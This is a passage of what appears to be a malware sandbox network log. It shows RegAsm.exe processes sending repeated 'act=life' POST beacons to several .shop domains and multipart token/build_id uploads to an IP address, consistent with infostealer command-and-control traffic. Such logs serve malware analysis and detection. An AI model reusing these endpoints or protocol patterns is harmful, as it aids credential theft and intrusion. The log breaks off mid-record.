2024-09-26 20:57:04 UTC	8000	IN	Data Raw: 46 c1 72 f0 d6 ed 0f 18 93 33 5b 7d 4c d0 50 d8 7f 55 dd d7 45 78 ae 0e 99 f8 ab c9 47 3f 35 24 d7 46 3f 6a f5 e3 6b 58 01 ee 4b 9d c2 64 b9 1e 27 71 2a 57 01 c3 16 b0 0e cb b4 25 a1 49 2d 7c 56 2f 0d 92 0c a3 d4 03 91 59 07 3c 5e 13 03 41 c0 63 02 88 34 e9 48 b1 9b d0 16 c7 2f bd 25 30 cd a9 10 e0 80 a2 50 f7 eb 9f 6e 1d cd 10 a5 fb 19 65 9d 36 2e 59 cb 73 38 db 58 51 12 bd 86 bc c9 2b 2f d9 3a 24 5a 54 68 6e 8c c1 52 72 eb 4e 74 d4 0c fa 9a 8e dc d8 b6 a9 6c 49 87 c6 22 b3 2b 25 76 b5 df 28 59 05 79 55 f7 c4 aa 95 33 47 59 9f 50 a5 7d 0e b3 9b 1b 09 7c 72 cd 03 98 a4 fd c0 5c eb 33 d7 d1 41 ed 15 f2 e8 3d c3 e9 bf 2c f5 bb b3 8b a8 51 a0 58 d5 54 eb c4 b5 54 5c 82 5c e7 d3 99 0f fd f5 d0 36 79 bd 69 a0 39 89 17 7d d7 ca f0 c6 0a c1 be 29 38 2c 83 74 f1 Data Ascii: Fr3[}LPUExG?5$F?jkXKd'q*W%I-\|V/Y<^Ac4H/%0Pne6.Ys8XQ+/:$ZThnRrNtlI"+%v(YyU3GYP}\|r\3A=,QXTT\\6yi9})8,t
2024-09-26 20:57:04 UTC	8000	IN	Data Raw: 8e ca 55 d4 6c 46 17 ec 28 f9 d4 58 7a 79 30 10 b3 ad 92 46 c8 9f 1a cf 5a e9 9c dc 1b cb 4c be d7 ec 2f 57 82 fc d3 d0 e2 36 65 9c c3 29 4e 82 97 1e 87 e7 c2 72 e4 ad be 81 2a bd ce ae b4 84 4d 00 fa 49 cc 0b 2b 4e 54 46 cc fb fb f0 9a 00 01 3f c1 69 67 7e 40 0f 19 68 9e 8a 0f 1e 39 a3 e4 0b 1e 32 7e dc ab 11 40 92 0f 12 40 4c d1 bf 04 a2 50 86 d1 dc 96 96 ea c5 ab 19 dd ce 4d 06 16 d9 13 c6 1c 8c 2b 21 ec a0 fd 89 00 48 aa 68 52 fa c0 dc 9e a0 50 a0 dd 34 20 d6 f8 dc 3d e2 c7 df 5b 37 94 8f b0 c3 23 2f 1d 03 94 67 98 37 df ae 1c 34 31 bc 43 15 60 b9 7b c9 c7 76 7d 7e 9c 1b 9d 0c 20 dd e1 d1 7e 39 e0 a8 77 10 77 37 ed f2 16 52 9b 09 89 2c a6 45 6e 49 ed 96 a4 cc 10 eb e4 3d 7a 7d 0c df 60 d6 fa 50 8c 22 87 fc cd f0 9f 0b c8 ca 83 38 d3 1a 2d a6 a6 d1 6a Data Ascii: UlF(Xzy0FZL/W6e)Nr*MI+NTF?ig~@h92~@@LPM+!HhRP4 =[7#/g741C`{v}~ ~9ww7R,EnI=z}`P"8-j
2024-09-26 20:57:04 UTC	8000	IN	Data Raw: 00 6b 91 b4 75 c8 49 c4 09 a8 d5 50 79 64 f1 1a 98 ef e5 6a a0 dd a8 69 b8 58 a3 30 04 97 42 88 52 b2 11 03 a0 f7 4f f5 54 e7 f6 bd 2f b4 80 79 a4 0d 51 4f 71 d3 0d d9 2a 55 2e ec 98 1e 7a cf 7e d9 44 64 6a ec 09 5a 68 d6 f3 67 c5 59 9d 03 4b df cc 0b 02 93 9a b9 72 b9 71 78 fa c9 a0 5f f9 39 a1 7e 1c 78 96 a5 31 41 41 08 15 f1 bc 5d 07 3c 49 01 ab 9e 01 8e b9 27 f6 1b 17 2f 21 eb aa e5 2b f3 ce 59 75 e2 1b b8 ab 17 d6 81 69 c1 41 cf 56 0e 75 05 b0 ae 3a 95 ed 54 75 1b 2d 11 7f 25 c2 47 1c 83 2f 81 32 1b 73 12 c6 2a 0c 0f f8 c6 23 4b 9d f3 64 18 71 25 c4 bd 6f f5 c7 cb fa 88 9a 98 12 5a b0 df 0f 12 37 20 74 06 9d 4f f2 25 0b 47 a6 70 b9 e3 21 fd ef 43 0a 8f 47 68 ee 36 01 e5 bb 83 f3 23 07 d7 a6 0b 6a 63 b7 a6 83 88 da e5 d0 95 cc 29 e0 07 23 8e 35 7a 74 Data Ascii: kuIPydjiX0BROT/yQOqU.z~DdjZhgYKrqx_9~x1AA]<I'/!+YuiAVu:Tu-%G/2s#Kdq%oZ7 tO%Gp!CGh6#jc)#5zt
2024-09-26 20:57:04 UTC	8000	IN	Data Raw: 8a b4 be 40 a2 e6 0a c1 4e 75 dc 75 e3 bf a9 65 28 ea d2 34 61 c2 d4 f4 33 3e 22 a8 8a 54 28 2c f8 94 28 55 7a c1 f1 1e cb 2c 28 1c fa 61 a7 4d db 59 0b e6 f7 7c 08 c2 f0 70 c3 86 8d 9c 93 76 dc 4e 61 2b 66 6a 2e f9 86 e4 dd bc 00 72 83 b5 77 81 5d 34 cd 97 30 b0 32 dc 82 77 49 c0 9f ae 00 35 bc 48 b1 87 5f 47 32 c4 da ae 15 b2 5a a2 b7 cf 57 f7 77 a8 5d 52 12 d2 04 8a 44 18 64 ee 38 17 0f 58 18 3a a5 b4 ad 3d ee 9a b9 39 35 77 66 75 a3 7d ca e4 7a 2a 08 f3 9a 03 8c 71 63 53 0a e6 16 7c 3d de a0 01 a9 52 3a f9 f3 04 11 3c 00 02 b1 7f b1 6a e4 fb 77 99 b0 22 57 84 21 68 a1 4b d1 c3 16 f1 e4 45 ff 68 1a e8 7c 5d 0c 89 7e 1a b5 25 2e 7e cd 78 b5 c2 4f 92 7e 18 6e 59 0c e5 f3 61 ef 0d 1d 7d 01 72 9c b7 46 0e cf 0e 8c f4 2a 04 3d 10 67 c0 8c b8 b8 a2 bf 21 4f Data Ascii: @Nuue(4a3>"T(,(Uz,(aMY\|pvNa+fj.rw]402wI5H_G2ZWw]RDd8X:=95wfu}zqcS\|=R:<jw"W!hKEh\|]~%.~xO~nYa}rF=g!O
2024-09-26 20:57:04 UTC	8000	IN	Data Raw: 5f ad 55 5b 51 b6 d6 62 08 46 00 cf 4a 07 f1 17 26 96 65 e9 82 cf bb 72 06 3c 4d ee fc 9c 96 b7 a7 6f a8 d6 0f f5 ed 8a d8 9e 8c ac 37 bd 38 a7 a1 7d 9f 3f 24 78 8a 94 82 90 9a f1 fb aa 1a 34 12 32 8c 32 ac ad 6a 78 85 38 5f 3c e0 a9 21 ab 45 19 79 02 78 1e 08 68 a6 f6 f9 03 a3 e7 26 56 ed ca 36 b1 4d a4 92 82 2a 9f 54 8f af ae 07 27 b6 94 90 72 fd a9 a2 1e ca 09 78 7d a9 ec 77 7b 60 a9 e0 ab 7b 80 88 bc 3e ae e4 6e 86 57 67 c4 f7 b7 e9 6f dd 68 99 7d bd 9d 63 18 6b f9 97 e8 96 21 3a 54 69 44 6f c1 46 07 dd f0 4c ae 15 1f b7 4e 7d c6 f6 c5 15 62 9a 65 1b 88 e1 ff 9b 93 5c c0 27 92 55 a1 91 32 01 1e 27 1d 77 9a 48 0b 73 0e 70 21 1a 04 65 7b 59 21 ec bb 3b 76 16 0a 04 4c 1e 1d 8e 4f 00 f3 61 46 25 10 12 81 8e 05 cd 26 a2 58 06 93 e2 d2 95 b9 94 06 29 a4 de Data Ascii: _U[QbFJ&er<Mo78}?$x422jx8_<!Eyxh&V6M*T'rx}w{`{>nWgoh}ck!:TiDoFLN}be\'U2'wHsp!e{Y!;vLOaF%&X)
2024-09-26 20:57:04 UTC	8000	IN	Data Raw: 12 d1 2e 62 96 eb 74 ce 56 66 4f 59 d8 c5 6c 94 a7 de 90 40 25 89 49 a2 f7 3c 6a 3b f2 35 30 a1 9a 12 80 6a a4 87 27 8d 79 47 09 aa 90 d9 89 1b 81 67 75 c4 1e 65 a0 00 38 04 75 28 f4 b7 b7 dd cc 17 3e 03 a9 de 11 ae eb 62 c0 a4 e7 77 50 ee d4 a0 2a 14 89 67 b1 02 2a 5b e2 cf 9c 4f d3 18 fc b9 d1 f8 0e 44 db 7d d2 94 af d5 99 5e 66 8f b0 c8 b2 e1 5f 88 4a 83 6c 6a 20 22 58 ee 60 43 45 97 46 ad e0 82 64 f2 70 f7 a1 9f fb 68 82 c3 cb 27 2b 28 d2 b1 68 d4 d6 97 75 50 a4 b9 f0 d0 5e 7e 1d 19 56 68 c7 f3 bf f4 a9 e5 a3 ce e8 ca 57 69 61 83 56 11 27 cf 80 e1 5e 4c 9a 36 c6 4a 04 e3 0f 63 18 b5 a8 a4 5b 13 a4 ea d5 56 1e 68 84 e4 db ac 92 07 60 f8 47 20 34 da d5 f1 ae d7 05 c5 ab 8c dc 11 f8 9b f8 b5 76 b8 eb 03 63 dd 19 4c 9d 46 e2 61 f6 8e 17 2c 0c 7e 3f 97 4b Data Ascii: .btVfOYl@%I<j;50j'yGgue8u(>bwPg[OD}^f_Jlj "X`CEFdph'+(huP^~VhWiaV'^L6Jc[Vh`G 4vcLFa,~?K
2024-09-26 20:57:04 UTC	8000	IN	Data Raw: a1 00 c3 90 15 dc a8 68 99 43 79 c1 d5 4d 47 15 f3 ef b2 15 c2 1a cc ee 9c 3a 03 6e 5e ae d7 96 48 99 8a 68 97 c5 0f e5 76 e0 54 8f 96 f3 e9 86 df fb ab 55 aa 23 ce ea c2 db 04 26 9a 52 da b7 85 c7 b9 85 24 34 be fe ff 90 8f 64 ca e4 4e ce 9c ab 4c d0 3b 18 c2 90 69 fb 9d 48 41 33 2b 85 03 c4 42 b8 fe dd df 5c 62 cc ec a7 38 ce cb 89 08 62 35 6f c8 4b 97 11 a1 a3 e8 f7 3f 18 6c 08 e3 67 28 78 cf 37 c6 8f 7d eb 11 a3 bf 14 e6 de e6 bf 70 4c cf 90 b2 f8 a2 79 72 91 26 fb 50 bd 10 6c be 74 98 33 24 b6 86 e5 45 2d d2 55 ca 5d 1c d8 fa a3 0b 33 54 a0 8b 72 3f 09 bc 19 7b de 1b 17 f4 0a 80 2e f7 20 b6 8e 28 41 d4 43 2f 61 e8 af e3 cf 08 41 66 21 90 eb f2 9b d7 9c 13 d5 35 95 7b b0 12 4b ae 23 ac 13 42 87 77 8a 9d 94 63 45 2e 4e d8 6a de 3b dc bb 91 c1 fb 5a 20 Data Ascii: hCyMG:n^HhvTU#&R$4dNL;iHA3+B\b8b5oK?lg(x7}pLyr&Plt3$E-U]3Tr?{. (AC/aAf!5{K#BwcE.Nj;Z
2024-09-26 20:57:04 UTC	8000	IN	Data Raw: 99 73 07 ba 05 53 0a 2e 8e ce 74 09 14 aa 3e 5d 9e e9 dd 64 05 b6 14 43 94 83 8f 1f 4d ca 52 ba 85 36 ab af 17 a7 76 75 d8 c3 12 21 29 fd d1 ce 6b 0f ca 78 93 32 72 fa 82 7e 71 e5 24 25 c6 54 c7 ce 9e 61 ad 3c 55 98 fd 12 c0 4d f8 e4 5c eb c8 f6 36 f6 0a 13 51 5d 4d 0c cd 86 11 06 16 3c b5 a3 b0 86 1c 5e f1 e7 e1 0e 2a b3 53 41 4a d2 52 4e 21 b2 7a 93 20 b7 ae f8 c2 00 c0 07 11 b6 b5 8d 98 bb 03 f0 f6 a3 95 63 3c 3c 17 9a 74 2f d0 af cd d0 dd 22 01 64 38 8e ee eb 53 e4 77 9a 0a 0d b2 93 4e 29 62 80 39 ed 62 cc 14 f3 f6 b2 19 21 60 df f0 66 33 30 09 c7 bc 65 fa 96 dd e5 7b 6e 1c 60 b8 3b 70 3e 0e 07 0f b9 bf 8d bc 8f 88 b3 58 b0 71 9e 80 42 0b e8 8a fd 9a 80 db b9 d8 e9 6a d6 91 8f 0a f1 ca bc 70 7e 67 36 86 f5 a8 ac db f3 ab 7a b7 ee 5d fe 8c c4 01 8f 63 Data Ascii: sS.t>]dCMR6vu!)kx2r~q$%Ta<UM\6Q]M<^*SAJRN!z c<<t/"d8SwN)b9b!`f30e{n`;p>XqBjp~g6z]c
2024-09-26 20:57:04 UTC	8000	IN	Data Raw: 82 9c 92 0b 46 c8 04 70 76 13 9b 87 42 0f ae 6d 7a c3 d0 76 5d bc b0 ff 48 db bf 3e fc 06 2e b8 bd d7 2e 37 77 1c bb 33 5d 8d 3b f0 bf 65 5f 83 c1 77 86 3d ad 8a 0a 11 9b 49 1f 6d d3 f9 d2 c3 2e e1 b7 e8 4e ce ea b1 2f 5e a7 70 20 8a e2 df 18 7e 39 b7 b7 5b 71 e4 ca 40 07 3d 72 f9 e4 f7 25 a2 4e 98 96 47 59 4b 96 b3 84 1a 48 c8 8a 10 81 29 1c 91 ff 8f f6 55 73 98 3d 66 fb 39 db 5d 21 7a f3 64 08 3e 22 28 17 0f b7 f9 4c dd 80 02 98 f7 48 a8 94 62 60 f7 32 41 83 1a e4 00 24 f8 90 bf bd 63 e7 47 75 7e 13 f3 58 7a 36 e8 68 24 0e 4a e7 13 e8 23 ce 89 fe 2b 02 1c 26 87 47 80 c4 2e 1f 43 be 6f f8 1f a8 62 49 a0 c9 de 42 6e dd 1a a4 42 7a eb 9f 6e 5b c9 09 12 ed 5b ee 9a c7 45 64 14 51 98 e0 f8 d7 bb de 72 cb da 54 bb a0 ef d7 e0 52 85 2b 84 cb 22 72 85 53 3f 1e Data Ascii: FpvBmzv]H>..7w3];e_w=Im.N/^p ~9[q@=r%NGYKH)Us=f9]!zd>"(LHb`2A$cGu~Xz6h$J#+&G.CobIBnBzn[[EdQrTR+"rS?

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49769	188.114.97.3	443	8136	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:57:04 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: ghostreedmnu.shop
2024-09-26 20:57:04 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 20:57:04 UTC	776	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:57:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mmmree5mdun00jmrc19dnibhjc; expires=Mon, 20 Jan 2025 14:43:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kRVTw%2BJmq8m3U0ooMK6ehdbgOpCqeSzf48P791KUqn7nZS2%2BIqD2j9%2Fvq9IWEAWPMTVaSIWf4ptAPFU27J2WXg9BW9ChNJdqtTUyr53BzAS39wObETS5XeawGLOpEJKsWS%2FmOA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c962a0a6ec242b1-EWR
2024-09-26 20:57:04 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 20:57:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49770	188.114.96.3	443	8136	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:57:05 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: offensivedzvju.shop
2024-09-26 20:57:05 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 20:57:05 UTC	770	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:57:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bor8k91i0o0mjb7vqpvgt1oqpo; expires=Mon, 20 Jan 2025 14:43:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mmz8HI549JCJG3qKllZPBPw%2FRFNimHuNk%2BsyAmCDPwK1Qc8uAh4GdwjHVHTP9RuwX1aR6THwg5aapD5%2FzRkNCjDPoPN47XuXP8B8ZLyU7GQWXu9oQYWbdx9nzMLN5a507q12hBIg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c962a105a434390-EWR
2024-09-26 20:57:05 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 20:57:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49772	188.114.96.3	443	8136	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:57:06 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: vozmeatillu.shop
2024-09-26 20:57:06 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 20:57:06 UTC	790	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:57:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=j7l3q71ner24rumqqj0sjoroc4; expires=Mon, 20 Jan 2025 14:43:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lB0jpkClugtVBzCdzoie5pO6hXkNP6tLi3kp9A62dw5zYOy7h5fU0GhfNgYF4BkzhUFoZfsgUbB3cZMJict6QiBR0LPQkPW739Ui0ha0d94IWJJUlUuSVGcX3K1WPY5DsSOs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c962a162a3c1a30-EWR alt-svc: h3=":443"; ma=86400
2024-09-26 20:57:06 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 20:57:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49771	5.75.211.162	443	7476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:57:06 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEHJJECBKKECFIEBGCAK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 499 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:57:06 UTC	499	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 33 36 31 36 66 37 38 62 36 33 30 32 61 32 39 33 63 38 32 65 33 35 30 31 62 37 30 33 36 65 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 0d 0a 43 6f 6e 74 Data Ascii: ------IEHJJECBKKECFIEBGCAKContent-Disposition: form-data; name="token"c23616f78b6302a293c82e3501b7036e------IEHJJECBKKECFIEBGCAKContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------IEHJJECBKKECFIEBGCAKCont
2024-09-26 20:57:07 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:57:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 20:57:07 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49773	104.21.58.182	443	8136	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:57:07 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: drawzhotdog.shop
2024-09-26 20:57:07 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 20:57:07 UTC	764	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:57:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cf8p36m31a7jnvtm2qqocr77lp; expires=Mon, 20 Jan 2025 14:43:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zGF8bmLGtYEcjYPRQqN9HI9VDqGI0AVAedXaPqfK6C8tdClf%2BokP1yG5uax92vfRCQwF0YyFBUudOhi80Op48uG%2B5xmhEVArH7N83GjTFIOLP9ZqZGVSzV26w6uDUconfnJG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c962a1bea1143ac-EWR
2024-09-26 20:57:07 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 20:57:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49774	5.75.211.162	443	7476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:57:07 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEBFIEBAFCBAAAAKJKJE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:57:07 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 45 42 46 49 45 42 41 46 43 42 41 41 41 41 4b 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 33 36 31 36 66 37 38 62 36 33 30 32 61 32 39 33 63 38 32 65 33 35 30 31 62 37 30 33 36 65 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 49 45 42 41 46 43 42 41 41 41 41 4b 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 49 45 42 41 46 43 42 41 41 41 41 4b 4a 4b 4a 45 0d 0a 43 6f 6e 74 Data Ascii: ------IEBFIEBAFCBAAAAKJKJEContent-Disposition: form-data; name="token"c23616f78b6302a293c82e3501b7036e------IEBFIEBAFCBAAAAKJKJEContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------IEBFIEBAFCBAAAAKJKJECont
2024-09-26 20:57:08 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:57:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 20:57:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49775	188.114.97.3	443	8136	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:57:08 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: fragnantbui.shop
2024-09-26 20:57:08 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 20:57:08 UTC	762	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:57:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=l389kht9r435aete750hcop0ee; expires=Mon, 20 Jan 2025 14:43:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5HPuMLX6cdGpod3eKPjcWoPR5liq5jflekd2vZhdButlpGSSXi%2Fwde2lJy7KBYPWgsUCeMhRVyBjAgaBdzS0BaSvWzLJLEb8GqJB3APwMyY819OVL7WpeDtLsOiQierBARrr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c962a21db78c443-EWR
2024-09-26 20:57:08 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 20:57:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49776	188.114.97.3	443	8136	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:57:09 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: stogeneratmns.shop
2024-09-26 20:57:09 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 20:57:09 UTC	772	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:57:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8ru9vnkl9ncsblg15hdvgnv6f6; expires=Mon, 20 Jan 2025 14:43:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jkz2onPKTVIDagk8x%2BnxwYQhFOzPHlPn1R7lo8cz0et8KiqzIAShYJURPtW5Ap9dDhppFw8EYDkm3TL3lDFLS%2FZyjdd4eoBe7A3HJLrZ12C99kTGpRjGIXhXC%2FJwXKLaGmeUmis%3D"}],"group":"cf-nel","max_age":604800} NEL: 